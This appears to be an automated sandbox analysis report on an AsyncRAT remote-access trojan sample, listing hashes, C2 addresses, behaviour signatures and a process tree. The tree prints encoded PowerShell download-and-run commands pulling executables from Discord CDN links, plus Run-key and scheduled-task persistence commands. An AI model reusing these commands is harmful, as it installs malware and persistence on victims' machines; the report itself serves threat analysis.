asyncrat | 69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c

Analysis

max time kernel
151s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2022 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe
Size

532KB
MD5

84e6aa267c6970d2d777d60840390102
SHA1

c97e555e98c5bec69bcad9607cf0153ff827a141
SHA256

69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c
SHA512

47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc
SSDEEP

12288:Lflmc/U97143ei/xLxS0VMmX+gJmdqKkSl2N3m:LNtsCF/x9S0KaJuqnSl2N3

Score

10^/10

asyncrat defendersmartscren system guard runtime persistence rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/4560-251-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/4504-289-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

18 2236 powershell.exe
44 4996 powershell.exe
50 4900 powershell.exe
57 4572 powershell.exe
60 3104 powershell.exe
63 1120 powershell.exe
Downloads MZ/PE file

flow	pid	process
18	2236	powershell.exe
44	4996	powershell.exe
50	4900	powershell.exe
57	4572	powershell.exe
60	3104	powershell.exe
63	1120	powershell.exe

Executes dropped EXE 18 IoCs

Processes:

0.exeATh6gvXFsr.exeJkGYpyAJ0I.exebaXLOuLByK.execbo4yLG34o.exe2sWNpbbWsk.exetHdB1QSPrG.exeOGd2tdo93o.exeDyfpo1N6ED.exeBVIpn2dy5y.exeyW1Buu2Hbr.exedsffe4vb5.exeqweqweqweqw.exeasdsadsadsa.exetryrtytryrty.exeqweqwewqe.exedsffe4vb5.exeretertee.exe

pid	process
4940	0.exe
4276	ATh6gvXFsr.exe
1300	JkGYpyAJ0I.exe
4052	baXLOuLByK.exe
1904	cbo4yLG34o.exe
952	2sWNpbbWsk.exe
3616	tHdB1QSPrG.exe
3052	OGd2tdo93o.exe
4760	Dyfpo1N6ED.exe
2416	BVIpn2dy5y.exe
1616	yW1Buu2Hbr.exe
1540	dsffe4vb5.exe
2724	qweqweqweqw.exe
3160	asdsadsadsa.exe
2092	tryrtytryrty.exe
3992	qweqwewqe.exe
624	dsffe4vb5.exe
4044	retertee.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/868-132-0x00007FF704F40000-0x00007FF70509F000-memory.dmp	upx
behavioral2/memory/868-134-0x00007FF704F40000-0x00007FF70509F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
C:\Users\Admin\AppData\Local\Temp\0.exe	upx
behavioral2/memory/4940-138-0x00007FF7B4340000-0x00007FF7B44A3000-memory.dmp	upx
behavioral2/memory/4940-193-0x00007FF7B4340000-0x00007FF7B44A3000-memory.dmp	upx

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

JkGYpyAJ0I.exetHdB1QSPrG.exe2sWNpbbWsk.exeDyfpo1N6ED.exeATh6gvXFsr.execbo4yLG34o.exeOGd2tdo93o.exeBVIpn2dy5y.exeyW1Buu2Hbr.exebaXLOuLByK.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	JkGYpyAJ0I.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	tHdB1QSPrG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	2sWNpbbWsk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	Dyfpo1N6ED.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	ATh6gvXFsr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cbo4yLG34o.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	OGd2tdo93o.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	BVIpn2dy5y.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	yW1Buu2Hbr.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	baXLOuLByK.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exeretertee.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	retertee.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

qweqweqweqw.exedsffe4vb5.exetryrtytryrty.exeasdsadsadsa.exedsffe4vb5.exe

description	pid	process	target process
PID 2724 set thread context of 4560	2724	qweqweqweqw.exe	RegAsm.exe
PID 1540 set thread context of 952	1540	dsffe4vb5.exe	RegAsm.exe
PID 2092 set thread context of 4504	2092	tryrtytryrty.exe	RegAsm.exe
PID 3160 set thread context of 2596	3160	asdsadsadsa.exe	RegAsm.exe
PID 624 set thread context of 1008	624	dsffe4vb5.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3816 3992 WerFault.exe qweqwewqe.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3668 schtasks.exe
4532 schtasks.exe

pid	pid_target	process	target process
3816	3992	WerFault.exe	qweqwewqe.exe

pid	process
3668	schtasks.exe
4532	schtasks.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeqweqweqweqw.exepowershell.exepowershell.exe

pid	process
4900	powershell.exe
4996	powershell.exe
4996	powershell.exe
2236	powershell.exe
2236	powershell.exe
1120	powershell.exe
1120	powershell.exe
3104	powershell.exe
3104	powershell.exe
4572	powershell.exe
4572	powershell.exe
2236	powershell.exe
1120	powershell.exe
1324	powershell.exe
1324	powershell.exe
4900	powershell.exe
4900	powershell.exe
4676	powershell.exe
4676	powershell.exe
4996	powershell.exe
3104	powershell.exe
4948	powershell.exe
4948	powershell.exe
3484	powershell.exe
3484	powershell.exe
4572	powershell.exe
4676	powershell.exe
1324	powershell.exe
4948	powershell.exe
3484	powershell.exe
2724	qweqweqweqw.exe
2724	qweqweqweqw.exe
2732	powershell.exe
2732	powershell.exe
2732	powershell.exe
740	powershell.exe
740	powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeqweqweqweqw.exepowershell.exedsffe4vb5.exepowershell.exeasdsadsadsa.exedsffe4vb5.exe

description	pid	process
Token: SeDebugPrivilege	4900	powershell.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	4676	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	2724	qweqweqweqw.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	1540	dsffe4vb5.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	3160	asdsadsadsa.exe
Token: SeDebugPrivilege	624	dsffe4vb5.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.execmd.exe0.execmd.execmd.execmd.exeATh6gvXFsr.exeJkGYpyAJ0I.exebaXLOuLByK.execmd.execmd.execmd.execmd.exetHdB1QSPrG.execbo4yLG34o.exe2sWNpbbWsk.execmd.exeOGd2tdo93o.execmd.exeDyfpo1N6ED.execmd.exeBVIpn2dy5y.exeyW1Buu2Hbr.exe

description	pid	process	target process
PID 868 wrote to memory of 4204	868	69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe	cmd.exe
PID 868 wrote to memory of 4204	868	69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe	cmd.exe
PID 4204 wrote to memory of 4940	4204	cmd.exe	0.exe
PID 4204 wrote to memory of 4940	4204	cmd.exe	0.exe
PID 4940 wrote to memory of 3232	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 3232	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 460	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 460	4940	0.exe	cmd.exe
PID 3232 wrote to memory of 4276	3232	cmd.exe	ATh6gvXFsr.exe
PID 3232 wrote to memory of 4276	3232	cmd.exe	ATh6gvXFsr.exe
PID 4940 wrote to memory of 1076	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 1076	4940	0.exe	cmd.exe
PID 460 wrote to memory of 1300	460	cmd.exe	JkGYpyAJ0I.exe
PID 460 wrote to memory of 1300	460	cmd.exe	JkGYpyAJ0I.exe
PID 4940 wrote to memory of 4468	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4468	4940	0.exe	cmd.exe
PID 1076 wrote to memory of 4052	1076	cmd.exe	baXLOuLByK.exe
PID 1076 wrote to memory of 4052	1076	cmd.exe	baXLOuLByK.exe
PID 4940 wrote to memory of 4784	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4784	4940	0.exe	cmd.exe
PID 4276 wrote to memory of 2236	4276	ATh6gvXFsr.exe	powershell.exe
PID 4276 wrote to memory of 2236	4276	ATh6gvXFsr.exe	powershell.exe
PID 4940 wrote to memory of 4984	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4984	4940	0.exe	cmd.exe
PID 1300 wrote to memory of 4996	1300	JkGYpyAJ0I.exe	powershell.exe
PID 1300 wrote to memory of 4996	1300	JkGYpyAJ0I.exe	powershell.exe
PID 4052 wrote to memory of 4900	4052	baXLOuLByK.exe	powershell.exe
PID 4052 wrote to memory of 4900	4052	baXLOuLByK.exe	powershell.exe
PID 4940 wrote to memory of 2052	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 2052	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4848	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4848	4940	0.exe	cmd.exe
PID 4784 wrote to memory of 952	4784	cmd.exe	2sWNpbbWsk.exe
PID 4784 wrote to memory of 952	4784	cmd.exe	2sWNpbbWsk.exe
PID 4468 wrote to memory of 1904	4468	cmd.exe	cbo4yLG34o.exe
PID 4468 wrote to memory of 1904	4468	cmd.exe	cbo4yLG34o.exe
PID 4984 wrote to memory of 3616	4984	cmd.exe	tHdB1QSPrG.exe
PID 4984 wrote to memory of 3616	4984	cmd.exe	tHdB1QSPrG.exe
PID 2052 wrote to memory of 3052	2052	cmd.exe	OGd2tdo93o.exe
PID 2052 wrote to memory of 3052	2052	cmd.exe	OGd2tdo93o.exe
PID 4940 wrote to memory of 2128	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 2128	4940	0.exe	cmd.exe
PID 3616 wrote to memory of 1120	3616	tHdB1QSPrG.exe	powershell.exe
PID 3616 wrote to memory of 1120	3616	tHdB1QSPrG.exe	powershell.exe
PID 1904 wrote to memory of 4572	1904	cbo4yLG34o.exe	powershell.exe
PID 1904 wrote to memory of 4572	1904	cbo4yLG34o.exe	powershell.exe
PID 952 wrote to memory of 3104	952	2sWNpbbWsk.exe	powershell.exe
PID 952 wrote to memory of 3104	952	2sWNpbbWsk.exe	powershell.exe
PID 4940 wrote to memory of 4520	4940	0.exe	cmd.exe
PID 4940 wrote to memory of 4520	4940	0.exe	cmd.exe
PID 4848 wrote to memory of 4760	4848	cmd.exe	Dyfpo1N6ED.exe
PID 4848 wrote to memory of 4760	4848	cmd.exe	Dyfpo1N6ED.exe
PID 3052 wrote to memory of 1324	3052	OGd2tdo93o.exe	powershell.exe
PID 3052 wrote to memory of 1324	3052	OGd2tdo93o.exe	powershell.exe
PID 2128 wrote to memory of 2416	2128	cmd.exe	BVIpn2dy5y.exe
PID 2128 wrote to memory of 2416	2128	cmd.exe	BVIpn2dy5y.exe
PID 4760 wrote to memory of 4676	4760	Dyfpo1N6ED.exe	powershell.exe
PID 4760 wrote to memory of 4676	4760	Dyfpo1N6ED.exe	powershell.exe
PID 4520 wrote to memory of 1616	4520	cmd.exe	yW1Buu2Hbr.exe
PID 4520 wrote to memory of 1616	4520	cmd.exe	yW1Buu2Hbr.exe
PID 2416 wrote to memory of 4948	2416	BVIpn2dy5y.exe	powershell.exe
PID 2416 wrote to memory of 4948	2416	BVIpn2dy5y.exe	powershell.exe
PID 1616 wrote to memory of 3484	1616	yW1Buu2Hbr.exe	powershell.exe
PID 1616 wrote to memory of 3484	1616	yW1Buu2Hbr.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe
"C:\Users\Admin\AppData\Local\Temp\69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:868

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:4204

C:\Users\Admin\AppData\Local\Temp\0.exe
C:\Users\Admin\AppData\Local\Temp\0.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4940

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe
C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe
"C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
8⤵
PID:952

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:460

C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe
C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADEAOQA4ADgAOAAxADkAOQA3ADMAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwB1AGkAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAcwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAagBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHEAdwBlAHEAdwBlAHEAdwBlAHEAdwAuAGUAeABlACcAKQApADwAIwB3AGkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwByAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAcQB3AGUAcQB3AC4AZQB4AGUAJwApADwAIwBnAHcAaQAjAD4A"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe
"C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
8⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
8⤵
PID:2596

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
9⤵
- Creates scheduled task(s)
PID:3668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
8⤵
PID:4728

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
8⤵
PID:4560

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1076

C:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exe
C:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe
"C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3160

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
8⤵
PID:2596

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exe
C:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADUANAA4ADQANwA3ADEAOQA0ADQANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAcABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB0AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAByAHkAcgB0AHkAdAByAHkAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAZQBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AbQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAcgB5AHIAdAB5AHQAcgB5AHIAdAB5AC4AZQB4AGUAJwApADwAIwBiAHcAdgAjAD4A"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572

C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe
"C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
8⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\SysWOW64\cmd.exe
